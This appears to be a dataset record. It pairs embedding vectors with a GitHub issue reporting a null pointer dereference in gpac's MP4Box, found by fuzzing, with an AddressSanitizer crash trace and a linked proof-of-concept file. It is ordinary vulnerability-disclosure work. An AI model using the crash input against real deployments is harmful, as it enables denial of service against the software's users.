0.024694807827472687, 0.01729874312877655, -0.009237343445420265, -0.0014293125132098794, 0.007152365054935217, 0.018428267911076546, 0.009980044327676296, 0.003073312109336257, 0.009299234487116337, 0.002231971127912402, 0.01904718577861786, 0.0024601968470960855, 0.007341908290982246, -0.0036535472609102726, -0.005547047592699528, -0.0003420969587750733, 0.000278271094430238, -0.005388450343161821, 0.015550301410257816, 0.007879593409597874, 0.03178141266107559, 0.005577993579208851, 0.010096090845763683, -0.015875233337283134, 0.023193931207060814, -0.0005986092146486044, -0.016370367258787155, 0.0007833174313418567, -0.001576305367052555, -0.004197034053504467, 0.009384335950016975, -0.007434746250510216, -0.023797376081347466, 0.019681574776768684, -0.006239461712539196, -0.008541060611605644, 0.020393330603837967, -0.005396186839789152, 0.0010038067121058702, 0.009802105836570263, 0.013221624307334423, 0.005407791584730148, -0.0051254103891551495, 0.0004262310394551605, -0.002324808621779084, 0.00048401279491372406, 0.000797823304310441, 0.03314302861690521, -0.028841553255915642, 0.007283885031938553, -0.004823687952011824, 0.01187547855079174, -0.013005003333091736, 0.0032551190815865993, 0.021971570327878, -0.030063915997743607, -0.011813587509095669, -0.03106965683400631, -0.00635550869628787, 0.010374603793025017, 0.007144628558307886, 0.02961520105600357, -0.0023074017371982336, 0.009980044327676296, 0.002429251093417406, -0.014482668600976467, 0.01640131324529648, -0.0030520367436110973, -0.009631902910768986, -0.008293493650853634, -0.0023093358613550663, 0.0049242619425058365, 0.005431000608950853, -0.02912006713449955, -0.005697908811271191, -0.01592165231704712, 0.025483926758170128, 0.0024079757276922464, 0.011921897530555725, -0.005651490297168493, -0.02255954220890999, -0.006692044902592897, -0.017948606982827187, 0.017809350043535233, -0.008788627572357655, 0.01926380582153797, -0.004212507046759129, -0.009755686856806278, -0.010962575674057007, -0.010668589733541012, 0.0055741253308951855, 0.00044122047256678343, -0.0033324838150292635, -0.01914002187550068, -0.007071131840348244, 0.00952359288930893, 0.0166952982544899, -0.004286003299057484, 0.0002497428795322776, 0.007720995228737593, -0.020099345594644547, 0.0002368084533372894, -0.013832805678248405, -0.0062278569675982, -0.007674576714634895, -0.005914530251175165, -0.020749207586050034, -0.0009598056203685701, -0.030435265973210335, 0.015434253960847855, 0.01777840405702591, -0.01914002187550068, 0.010390076786279678, 0.006920271087437868, -0.01838184893131256, 0.00251628621481359, 0.0009245079709216952, -0.018907928839325905, 0.013306725770235062, -0.001217526732943952, -0.04202449694275856, 0.016200164332985878, 0.007639762479811907, -0.008657108061015606, 0.017174959182739258, 0.0036612835247069597, 0.009902679361402988, -0.004823687952011824, 0.008409541100263596, 0.006711386144161224, -0.0058487700298428535, -0.01748441904783249, -0.0018345100106671453, 0.009105823002755642, 0.006707517895847559, 0.0011749761179089546, 0.005678567569702864, 0.021956097334623337, -0.0025588369462639093, 0.005415527615696192, -0.004827556200325489, 0.015689557418227196, -0.0036226012744009495, 0.0007765479967929423, 0.019464954733848572, -0.031193440780043602, 0.012958584353327751, -0.014668343588709831, -0.012509869411587715, -0.012424767948687077, -0.010320448316633701, 0.00000582879420107929, -0.019867250695824623, 0.0030578391160815954, -0.0031893590930849314, -0.018815090879797935, -0.010119300335645676, -0.006862247362732887, 0.015619929879903793, 0.002317072357982397, -0.0014979736879467964, -0.001960227731615305, -0.0010860067559406161, -0.0020985170267522335, 0.007249070797115564, 0.0034523990470916033, -0.009484910406172276, 0.018598468974232674, -0.017608201131224632, 0.02070278860628605, 0.012223619967699051, 0.003848893102258444, 0.013817332684993744, -0.028284527361392975, 0.0010260491399094462, 0.017546311020851135, 0.004641881212592125, -0.02500426582992077, -0.014335676096379757, -0.029274797067046165, 0.0064057959243655205, -0.017221378162503242, 0.025576764717698097, -0.011689803563058376, 0.00393012585118413, 0.007403800264000893, 0.036392346024513245, 0.008889202028512955, -0.0006353574572131038, -0.005183433648198843, -0.006015104241669178, -0.003657415509223938, 0.005098332650959492, -0.007635894231498241, 0.018304483965039253, 0.013933379203081131, -0.006239461712539196, 0.003649679012596607, 0.011449973098933697, -0.0030365637503564358, 0.03691842779517174, -0.008417277596890926, -0.005028704181313515, 0.0029978815000504255, -0.0053497678600251675, -0.002191354753449559, 0.00495520792901516, 0.013848278671503067, 0.01163564808666706, 0.013252570293843746, 0.0031584131065756083, 0.0005942574935033917, 0.003520093159750104, 0.017731985077261925, 0.022327447310090065, 0.015875233337283134, -0.000679842138197273, -0.00982531439512968, 0.008525588549673557, 0.011821324005723, 0.015209896489977837, -0.0035703801549971104, 0.02325582318007946, 0.0016691430937498808, -0.014985539019107819, -0.0011507996823638678, -0.009655112400650978, -0.007856383919715881, 0.0068351696245372295, -0.010854264721274376, 0.00957001093775034, 0.015968071296811104, 0.019867250695824623, -0.004115801304578781, -0.01904718577861786, 0.01858299784362316, -0.0029978815000504255, 0.0027889967896044254, -0.024509131908416748, -0.004564516246318817, -0.022729743272066116, 0.00274644629098475, -0.019279278814792633, -0.01138034462928772, -0.01602996326982975, -0.0139256427064538, -0.00483529269695282, -0.004854633938521147, -0.007446350995451212, 0.009098086506128311, 0.03106965683400631, 0.01630847528576851, 0.0003435475518926978, 0.01671077124774456, 0.01220814697444439, -0.03691842779517174, 0.023333188146352768, -0.007299358025193214, 0.019387589767575264, 0.004893316421657801, -0.01729874312877655, -0.0013683878351002932, 0.0023963709827512503, -0.005674699321389198, -0.017762931063771248, 0.0031235991045832634, -0.010560279712080956, 0.020052926614880562, 0.020006507635116577, 0.002077241661027074, -0.013376353308558464, 0.006189174484461546, -0.011535074561834335, 0.023812849074602127, 0.0031893590930849314, 0.006452214438468218, 0.01708212122321129, 0.0013529148418456316, -0.0002654575800988823, 0.004309212788939476, 0.004688299726694822, 0.020006507635116577, -0.014768918044865131, 0.025360142812132835, -0.0005376845365390182, 0.010738218203186989, -0.0077287317253649235, 0.009492646902799606, 0.008007245138287544, 0.006011235993355513, 0.007403800264000893, 0.02601000666618347, -0.0010898750042542815, -0.006970557849854231, 0.010715008713304996, 0.005972553510218859, -0.011202406138181686, -0.02071826159954071, 0.006471555680036545, -0.010188928805291653, -0.004502624738961458, -0.0044059185311198235, 0.013105577789247036, -0.0001228768815053627, -0.011318453587591648, -0.007624289486557245, 0.007434746250510216, -0.00019824699847958982, 0.0008495609508827329, 0.012161727994680405, 0.019913669675588608, 0.026427775621414185, 0.005264666862785816, -0.013623920269310474, -0.015333680436015129, 0.005299480631947517, -0.00953132938593626, 0.003251250833272934, -0.026412302628159523, 0.00299401325173676, -0.0064986334182322025, 0.008502379059791565, -0.0006822597933933139, 0.00884278304874897, 0.007922143675386906, -0.0007397998124361038, -0.00247760396450758, 0.0044755470007658005, 0.004278266802430153, 0.019031712785363197, 0.006827433127909899, 0.010390076786279678, 0.0038198812399059534, 0.0030307613778859377, -0.019991034641861916, -0.017066648229956627, 0.002260982757434249, 0.01558898389339447, 0.003494949545711279, 0.027278786525130272, 0.02101224847137928, 0.004448469262570143, 0.005264666862785816, 0.006309089716523886, 0.00045766044058836997, -0.0002908428432419896, 0.014737972058355808, 0.012393821962177753, 0.011256561614573002, 0.016648879274725914, 0.00031622813548892736, -0.0002681169717106968, 0.007256807293742895, 0.02404494397342205, -0.006606943905353546, 0.008688054047524929, 0.024106835946440697, -0.019031712785363197, 0.010947102680802345, -0.013066895306110382, 0.01681908220052719, 0.024865008890628815, -0.0062742759473621845, -0.00933791697025299, -0.019960088655352592, 0.0027309732977300882, 0.033761948347091675, -0.011999262496829033, 0.013322198763489723, -0.01621563732624054, 0.008958830498158932, -0.04963717982172966, -0.02314751408994198, 0.032493166625499725, -0.006251066457480192, 0.01641678623855114, 0.0029011755250394344, -0.00013067378313280642, 0.0018760935636237264, -0.0015385901788249612, -0.0004939251230098307, 0.00032033814932219684, 0.017824823036789894, 0.026922909542918205, -0.018784144893288612, -0.008896938525140285, 0.0018741594394668937, -0.02618020959198475, 0.007001503836363554, 0.013623920269310474, 0.007632025983184576, -0.002489208709448576, -0.0067423321306705475, -0.01779387705028057, -0.0009670585277490318, -0.010761427693068981, 0.0016072512371465564, -0.007991772145032883, -0.004150615073740482, -0.01924833282828331, -0.009894942864775658, -0.018118808045983315, -0.02099677547812462, 0.008966566994786263, 0.02121339552104473, 0.011844532564282417, -0.007945353165268898, 0.00005158652857062407, -0.007604948244988918, 0.002705829683691263, 0.00478500546887517, -0.010831055231392384, -0.00299401325173676, 0.010034199804067612, -0.03069830685853958, 0.013569765724241734, 0.0051254103891551495, 0.0076165529899299145, -0.006862247362732887, 0.013012739829719067, -0.007136892061680555, 0.01904718577861786, -0.01593712531030178, 0.013422772288322449, 0.01041328627616167, 0.0031680837273597717, 0.01435888558626175, 0.01074595469981432, 0.011991526000201702, 0.016354894265532494, 0.012347403913736343, 0.019526846706867218, -0.017855769023299217, -0.00545034185051918, 0.009600956924259663, 0.018830563873052597, 0.0009235409088432789, -0.007701654452830553, -0.014436249621212482, -0.01593712531030178, -0.007720995228737593, 0.0017967948224395514, -0.01711306720972061, 0.005152488127350807, -0.008154237642884254, 0.0002302808134118095, 0.01681908220052719, -0.01641678623855114, 0.017840296030044556, 0.017762931063771248, 0.014397567138075829, 0.014227365143597126, -0.010212138295173645, 0.007705522235482931, -0.015132532455027103, 0.008363122120499611, -0.010436495766043663, -0.014196419157087803, -0.02590169571340084, 0.010947102680802345, 0.0019196112407371402, 0.0018248395062983036, -0.02500426582992077, 0.009453964419662952, -0.009384335950016975, -0.029878240078687668, 0.012533078901469707, 0.0012890889775007963, 0.018815090879797935, 0.016091853380203247, -0.02070278860628605, 0.01343050878494978, 0.01797955296933651, 0.022822581231594086, 0.034752216190099716, -0.019201913848519325, 0.0006353574572131038, -0.01906265877187252, -0.010490651242434978, 0.015759186819195747, -0.0018983358750119805, -0.008556533604860306, 0.007144628558307886, -0.043417058885097504, -0.012378348968923092, -0.004123537801206112, 0.005407791584730148, 0.01162791159003973, -0.00011084908328484744, 0.0004852216225117445, 0.010962575674057007, -0.009508119896054268, 0.0032415802124887705, 0.008997512981295586, 0.01001099031418562, 0.003955269232392311, 0.0023286768700927496, 0.00508285965770483, 0.0012977925362065434, -0.0227761622518301, 0.057590268552303314, 0.007918274961411953, 0.01992914266884327, 0.00725293904542923, 0.005334294866770506, -0.01074595469981432, -0.009020722471177578, -0.01691192016005516, -0.009662848897278309, 0.020780153572559357, 0.004038436338305473, -0.008254812099039555, 0.01450587809085846, -0.007643630728125572, 0.015689557418227196, -0.00208884640596807, -0.005307217128574848, -0.009879469871520996, -0.009384335950016975, -0.02238933928310871, -0.02091941051185131, 0.006866115611046553, 0.02529825083911419, -0.018149754032492638, -0.00034934989525936544, 0.012618179433047771, -0.008626162074506283, -0.0024872745852917433, 0.0069473483599722385, 0.005152488127350807, 0.0345974862575531, -0.016757190227508545, 0.004711509216576815, 0.008169710636138916, -0.0006285880226641893, 0.005144751630723476, 0.021631166338920593, 0.017066648229956627, 0.00048232043627649546, -0.022698797285556793, -0.00012680554937105626, 0.009732477366924286, -0.013585238717496395, -0.012417031452059746, 0.006908666342496872, 0.0016430324176326394, -0.0014960395637899637, 0.009484910406172276, 0.0031139284837991, 0.017561784014105797, 0.021228868514299393, 0.004641881212592125, -0.005651490297168493, 0.004309212788939476, 0.014482668600976467, -0.006138887722045183, 0.007469560019671917, -0.010606697760522366, -0.00027077639242634177, -0.01943400874733925, -0.0009394973749294877, -0.01368581224232912, -0.013005003333091736, -0.0027019616682082415, -0.010684062726795673, -0.00205016415566206, 0.016246583312749863, 0.01768556609749794, -0.012277775444090366, 0.020486168563365936, -0.014529087580740452, 0.002947594504803419, -0.01729874312877655, -0.008579743094742298, -0.01026629377156496, -0.0075043742544949055, 0.009972307831048965, 0.004723113961517811, 0.016494151204824448, 0.007136892061680555, -0.010815583169460297, -0.028392838314175606, -0.0009167714742943645, -0.0035645777825266123, 0.0028876368887722492, 0.0013045619707554579, 0.0024021733552217484, -0.0039030483458191156, -0.012022471986711025, 0.012726490385830402, 0.007837042212486267, -0.0081155551597476, -0.01593712531030178, 0.002005679300054908, 0.011883215047419071, -0.015202159993350506, -0.009446227923035622, -0.009647375904023647, -0.0004854633880313486, 0.01660246029496193, 0.006827433127909899, -0.000301480497000739, -0.017809350043535233, 0.0035316979046911, -0.010583488270640373, -0.00208884640596807, -0.0026555426884442568, -0.01187547855079174, -0.013407299295067787, -0.005964817013591528, 0.01661793328821659, 0.0018964017508551478, -0.013260306790471077, -0.00466509023681283, 0.003984281327575445, 0.013492400757968426, 0.0017232983373105526, -0.00952359288930893, 0.012533078901469707, 0.011921897530555725, -0.0073225670494139194, 0.00034451461397111416, 0.031998034566640854, 0.022048935294151306, 0.017948606982827187, -0.00003638557609519921, 0.007353513035923243, 0.00894335750490427, 0.001677846536040306, 0.014180946163833141, -0.019403062760829926, -0.02178589440882206, 0.025267304852604866, 0.013693548738956451, 0.010374603793025017, 0.02002198062837124, -0.015875233337283134, -0.00410032831132412, 0.02421514503657818, -0.0019292817451059818, -0.00434789527207613, 0.030559049919247627, 0.0021294630132615566, 0.0020869122818112373, -0.019975561648607254, -0.0015676019247621298, 0.00967058539390564, 0.015813341364264488, 0.005098332650959492, -0.020052926614880562, 0.036020997911691666, 0.008177447132766247, 0.0028489544056355953, 0.003887575352564454, 0.006432873196899891, 0.015952598303556442, 0.02930574119091034, 0.01001099031418562, -0.0181652270257473, 0.004061645828187466, -0.017762931063771248, 0.015558037906885147, 0.0004426710365805775, 0.0040074908174574375, 0.011008994653820992, -0.007659103721380234, -0.005995763000100851, -0.013461454771459103, 0.028501149266958237, -0.009353389963507652, -0.016927393153309822, 0.008239339105784893, 0.00784091092646122, -0.022838054224848747, 0.006626285146921873, 0.00929149892181158, 0.009268289431929588, 0.006916402839124203, 0.023998524993658066, 0.016679825261235237, 0.017066648229956627, 0.013948852196335793, 0.004374973010271788, 0.025917168706655502, 0.03202898055315018, -0.016664352267980576, -0.02774297632277012, -0.00011308540706522763, 0.010947102680802345, -0.00909035000950098, -0.005558652337640524, -0.0076668402180075645, 0.019913669675588608, -0.012300984933972359, -0.0051254103891551495, 0.017561784014105797, 0.017174959182739258, 0.003369231941178441, 0.013639393262565136, 0.011449973098933697, -0.005431000608950853, -0.01435888558626175, -0.01436662208288908, -0.0007683280273340642 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
[poc.zip](https://github.com/gpac/gpac/files/8311643/poc.zip) ``` Description Null Pointer Dereference in gpac Proof of Concept Version: ~/fuzzing/gpac/gpac/bin/gcc/MP4Box -version MP4Box - GPAC version 2.1-DEV-rev15-g6c0f4ff03-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D System information Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz command: ./MP4Box -info poc Result ~/fuzzing/gpac/gpac/bin/gcc/MP4Box -info ./poc [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] Warning: Error parsing NAL unit AddressSanitizer:DEADLYSIGNAL ================================================================= ==1172475==ERROR: AddressSanitizer: SEGV on unknown address 0x00010000000d (pc 0x7f031b4ec838 bp 0x000000000002 sp 0x7ffca1f029b8 T0) ==1172475==The signal is caused by a READ memory access. #0 0x7f031b4ec837 (/lib/x86_64-linux-gnu/libasan.so.5+0x12e837) #1 0x7f031b4ec9d1 (/lib/x86_64-linux-gnu/libasan.so.5+0x12e9d1) #2 0x7f031b4ec60b (/lib/x86_64-linux-gnu/libasan.so.5+0x12e60b) #3 0x7f031b3ea141 (/lib/x86_64-linux-gnu/libasan.so.5+0x2c141) #4 0x7f031b3e6e1f (/lib/x86_64-linux-gnu/libasan.so.5+0x28e1f) #5 0x7f031b4cc0b1 in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10e0b1) #6 0x7f031abc5655 in gf_list_add (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0xac655) #7 0x7f031b0ca909 in naludmx_process (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x5b1909) #8 0x7f031afa67ef in gf_filter_process_task (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x48d7ef) #9 0x7f031af944d3 in gf_fs_thread_proc (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x47b4d3) #10 0x7f031af9943a in gf_fs_run (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x48043a) #11 0x7f031ae07151 in gf_media_import (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x2ee151) #12 0x5613ea17fdc2 in convert_file_info (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x3ddc2) #13 0x5613ea16e6d2 in mp4boxMain (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x2c6d2) #14 0x7f031a94b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #15 0x5613ea15b53d in _start (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x1953d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libasan.so.5+0x12e837) ==1172475==ABORTING Occurrences list.c L99 ```
Untrusted Pointer Dereference
https://api.github.com/repos/gpac/gpac/issues/2149/comments
0
2022-03-20T16:24:25
2022-03-21T10:52:11Z
https://github.com/gpac/gpac/issues/2149
1,174,603,686
2,149
false
This is a GitHub Issue repo:gpac owner:gpac Title : Untrusted Pointer Dereference Issue date: --- start body --- [poc.zip](https://github.com/gpac/gpac/files/8311643/poc.zip) ``` Description Null Pointer Dereference in gpac Proof of Concept Version: ~/fuzzing/gpac/gpac/bin/gcc/MP4Box -version MP4Box - GPAC version 2.1-DEV-rev15-g6c0f4ff03-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D System information Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz command: ./MP4Box -info poc Result ~/fuzzing/gpac/gpac/bin/gcc/MP4Box -info ./poc [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] Warning: Error parsing NAL unit AddressSanitizer:DEADLYSIGNAL ================================================================= ==1172475==ERROR: AddressSanitizer: SEGV on unknown address 0x00010000000d (pc 0x7f031b4ec838 bp 0x000000000002 sp 0x7ffca1f029b8 T0) ==1172475==The signal is caused by a READ memory access. #0 0x7f031b4ec837 (/lib/x86_64-linux-gnu/libasan.so.5+0x12e837) #1 0x7f031b4ec9d1 (/lib/x86_64-linux-gnu/libasan.so.5+0x12e9d1) #2 0x7f031b4ec60b (/lib/x86_64-linux-gnu/libasan.so.5+0x12e60b) #3 0x7f031b3ea141 (/lib/x86_64-linux-gnu/libasan.so.5+0x2c141) #4 0x7f031b3e6e1f (/lib/x86_64-linux-gnu/libasan.so.5+0x28e1f) #5 0x7f031b4cc0b1 in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10e0b1) #6 0x7f031abc5655 in gf_list_add (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0xac655) #7 0x7f031b0ca909 in naludmx_process (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x5b1909) #8 0x7f031afa67ef in gf_filter_process_task (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x48d7ef) #9 0x7f031af944d3 in gf_fs_thread_proc (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x47b4d3) #10 0x7f031af9943a in gf_fs_run (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x48043a) #11 0x7f031ae07151 in gf_media_import (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x2ee151) #12 0x5613ea17fdc2 in convert_file_info (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x3ddc2) #13 0x5613ea16e6d2 in mp4boxMain (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x2c6d2) #14 0x7f031a94b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #15 0x5613ea15b53d in _start (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x1953d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libasan.so.5+0x12e837) ==1172475==ABORTING Occurrences list.c L99 ``` --- end body ---
2,985
[ -0.007193812169134617, 0.031201068311929703, -0.010804659686982632, 0.011201992630958557, 0.022306393831968307, 0.02054976485669613, -0.029081961140036583, 0.04338593780994415, -0.005635849665850401, 0.0026976794470101595, -0.031396251171827316, 0.030671291053295135, 0.013300187885761261, 0.00883890874683857, -0.00005631057501886971, 0.016144253313541412, -0.03697284683585167, 0.029305025935173035, -0.02533169835805893, -0.006813906133174896, 0.03270674869418144, -0.03769780695438385, -0.03262310102581978, 0.03125683590769768, -0.008762230165302753, 0.013816023245453835, -0.009779959917068481, 0.007158958353102207, -0.011125314049422741, 0.029806919395923615, 0.010881338268518448, 0.02569417841732502, -0.0067093451507389545, 0.019253205507993698, 0.04662036523222923, -0.007890886627137661, 0.034156665205955505, 0.056658241897821426, 0.012484610080718994, -0.008929528295993805, 0.0029887082055211067, -0.059000413864851, -0.026112422347068787, 0.003833911381661892, -0.0014882547548040748, 0.025094693526625633, 0.02054976485669613, -0.007172899786382914, -0.029555972665548325, -0.005510376300662756, 0.03245580196380615, -0.011773593723773956, -0.021651143208146095, -0.04787509888410568, 0.015475060790777206, -0.024983162060379982, 0.03460279479622841, 0.0005785721004940569, 0.008580991066992283, 0.018054237589240074, -0.019071966409683228, 0.026293661445379257, -0.011829359456896782, 0.02637731097638607, 0.007057882379740477, 0.009138651192188263, 0.007106677629053593, 0.02400725707411766, 0.0033616432920098305, 0.020884361118078232, 0.00006295456842053682, -0.03647095337510109, -0.0049283187836408615, 0.02717197686433792, 0.021553553640842438, -0.015279879793524742, 0.04595117270946503, 0.020424291491508484, -0.010504917241632938, 0.03691708296537399, -0.03594117611646652, 0.03125683590769768, -0.029277142137289047, 0.024774039164185524, 0.005946048069745302, 0.005367476027458906, -0.03011363185942173, -0.07606480270624161, -0.01872343011200428, -0.03058764338493347, 0.0038792213890701532, 0.02054976485669613, -0.0065490179695189, 0.01893255114555359, 0.02519228309392929, -0.0010133725591003895, -0.014764044433832169, -0.01397635042667389, -0.05030091851949692, -0.0029155153315514326, -0.03708437830209732, -0.03011363185942173, -0.00012318618246354163, 0.014819810166954994, -0.006273673381656408, -0.0009532498079352081, 0.004862096626311541, -0.015600534155964851, 0.020995892584323883, 0.1564793586730957, 0.02519228309392929, -0.007612057030200958, -0.001964008202776313, 0.015558709390461445, 0.010679186321794987, 0.013878759928047657, -0.017635993659496307, -0.016646146774291992, -0.05498526245355606, -0.04781933128833771, -0.022933760657906532, -0.013369894586503506, -0.0007384636555798352, 0.016911035403609276, -0.017482636496424675, 0.04639729857444763, 0.005346563644707203, 0.00775147182866931, -0.051472004503011703, -0.00823245383799076, -0.042884040623903275, -0.014213355258107185, 0.01201756950467825, -0.03318076208233833, 0.0002912465715780854, 0.0076329694129526615, -0.025526879355311394, 0.02070312201976776, 0.012596141546964645, 0.026098480448126793, -0.07344380021095276, -0.018235476687550545, 0.03761415556073189, -0.018277302384376526, -0.006611754652112722, -0.01493134256452322, 0.0024327910505235195, 0.010330649092793465, -0.012275487184524536, -0.019713275134563446, 0.018347008153796196, 0.0055626570247113705, 0.03524410352110863, 0.004133653827011585, 0.06262519955635071, 0.015586593188345432, 0.016701912507414818, 0.037642039358615875, 0.0030671292915940285, -0.01129958312958479, 0.0041650221683084965, -0.03711226209998131, 0.014387624338269234, -0.04592328891158104, -0.015642357990145683, -0.011466880328953266, 0.017635993659496307, 0.008908616378903389, -0.018444599583745003, 0.023770250380039215, 0.0000262628382188268, -0.011062577366828918, 0.016227900981903076, 0.019197439774870872, -0.049325015395879745, -0.004900435917079449, 0.024564916267991066, 0.045588694512844086, -0.01865372247993946, -0.007619027514010668, -0.001679078908637166, 0.02745080552995205, 0.004496132489293814, -0.0044647641479969025, -0.015447177924215794, -0.007835120894014835, 0.03134048357605934, -0.029779035598039627, -0.0011527874739840627, -0.022111212834715843, 0.005503405816853046, 0.0022410955280065536, 0.004283524584025145, -0.010999840684235096, 0.05526409298181534, -0.001279132324270904, -0.03591329604387283, 0.003034018212929368, 0.007263519335538149, 0.008197600021958351, 0.012143042869865894, -0.01567024178802967, 0.005764808505773544, 0.013251392170786858, -0.032539453357458115, 0.010323678143322468, -0.01430397480726242, 0.05163930356502533, 0.016227900981903076, 0.012840118259191513, -0.019253205507993698, -0.031033771112561226, 0.022877994924783707, 0.007242607418447733, -0.018639780580997467, 0.010734952054917812, -0.02544322982430458, 0.005921650677919388, -0.02540140599012375, -0.007890886627137661, 0.016409141942858696, 0.0008046857547014952, 0.023561129346489906, -0.010372472926974297, -0.0615098811686039, -0.01847248338162899, 0.00385830900631845, 0.013258363120257854, -0.012861030176281929, 0.008594932034611702, 0.0006482795579358935, 0.015363529324531555, -0.005479007959365845, 0.006193509791046381, 0.010546742007136345, -0.003785116132348776, -0.007793296594172716, 0.0037955723237246275, 0.021720850840210915, 0.026711907237768173, -0.003966355696320534, 0.0148616349324584, -0.02375631034374237, -0.001916955690830946, 0.010776776820421219, 0.06295979768037796, -0.035662345588207245, 0.003600391326472163, -0.01494528353214264, 0.0026035744231194258, 0.006737228017300367, 0.0049178628250956535, -0.011710857041180134, -0.012854059226810932, -0.014875576831400394, -0.022794347256422043, 0.012686762027442455, -0.016729796305298805, -0.00799544807523489, -0.02029881812632084, 0.029277142137289047, -0.027325332164764404, -0.021762676537036896, -0.008197600021958351, -0.005377931986004114, -0.01035156100988388, -0.012484610080718994, -0.0031455501448363066, -0.0023491422180086374, -0.01313288975507021, 0.03011363185942173, -0.0007924869423732162, -0.0036735842004418373, -0.02910984493792057, 0.0073541393503546715, -0.0033302749507129192, -0.004876038525253534, 0.013711461797356606, -0.0002964746381621808, -0.010267912410199642, 0.009452334605157375, 0.0012590914266183972, -0.017092274501919746, 0.018026353791356087, -0.0036700989585369825, -0.011320495046675205, 0.011125314049422741, 0.0005062505952082574, -0.015363529324531555, 0.03616424277424812, 0.018946493044495583, 0.027464747428894043, -0.049352895468473434, 0.019852690398693085, 0.013613871298730373, 0.025498997420072556, 0.0036317596677690744, 0.03766992315649986, -0.03058764338493347, 0.012749498710036278, -0.010030906647443771, 0.004346261266618967, -0.013209567405283451, 0.009919374249875546, -0.024202438071370125, 0.012895883992314339, -0.022111212834715843, 0.009717223234474659, -0.02300346828997135, 0.0016581667587161064, 0.025722060352563858, -0.0428282767534256, -0.037391092628240585, -0.013425661250948906, -0.012150013819336891, -0.008811025880277157, -0.01067221537232399, -0.014568863436579704, -0.01804029569029808, 0.007071823813021183, -0.01774752512574196, 0.019782982766628265, -0.03543928265571594, 0.004677372053265572, 0.03594117611646652, 0.009027118794620037, -0.006221392657607794, 0.027659928426146507, -0.08794295787811279, 0.016116369515657425, -0.008086067624390125, -0.010553712956607342, 0.009703281335532665, -0.04003997892141342, 0.000525855808518827, -0.04015151038765907, -0.02752051316201687, 0.01678556203842163, 0.034045133739709854, 0.01117410883307457, 0.0005162710440345109, 0.000656993011943996, 0.011676003225147724, -0.009187445975840092, -0.011062577366828918, -0.01731533743441105, -0.00718684121966362, -0.010999840684235096, 0.017259571701288223, -0.0028632348403334618, 0.0009663199307397008, 0.0400957427918911, 0.015238055028021336, 0.029583854600787163, 0.014345799572765827, -0.00715198740363121, -0.012986503541469574, -0.008239423856139183, -0.0024815862998366356, -0.0022585224360227585, 0.027408981695771217, -0.042633093893527985, -0.009800871834158897, 0.03259521722793579, -0.009103797376155853, 0.013739344663918018, 0.013321099802851677, -0.0127564687281847, -0.0033250469714403152, -0.009661456570029259, -0.04731743782758713, 0.043497469276189804, -0.03990056365728378, 0.020758887752890587, -0.0006400017882697284, -0.014833752065896988, 0.019099850207567215, 0.03449126332998276, -0.017622051760554314, -0.0023717971052974463, -0.05255943909287453, 0.02785510942339897, 0.046118468046188354, -0.06050609424710274, 0.01587936468422413, 0.031675077974796295, -0.029026195406913757, 0.07165928930044174, -0.022989526391029358, -0.011543558910489082, -0.0473732054233551, 0.07444758713245392, -0.03384995460510254, -0.05504102632403374, -0.000025187273422488943, 0.029946334660053253, -0.034881625324487686, -0.016771620139479637, 0.005430212710052729, -0.05470643192529678, 0.020577648654580116, 0.01116016786545515, -0.008741318248212337, 0.01092316210269928, 0.001362781273201108, 0.03920348733663559, 0.007131075486540794, -0.0002409264852758497, 0.03719591349363327, 0.006500222720205784, 0.0441945418715477, -0.038506411015987396, -0.017482636496424675, 0.01011455524712801, 0.04056975245475769, 0.03591329604387283, -0.015321704559028149, 0.009947257116436958, -0.04818180948495865, 0.02637731097638607, -0.015712065622210503, -0.0035254559479653835, 0.018054237589240074, 0.031647197902202606, 0.022682813927531242, 0.05004997178912163, 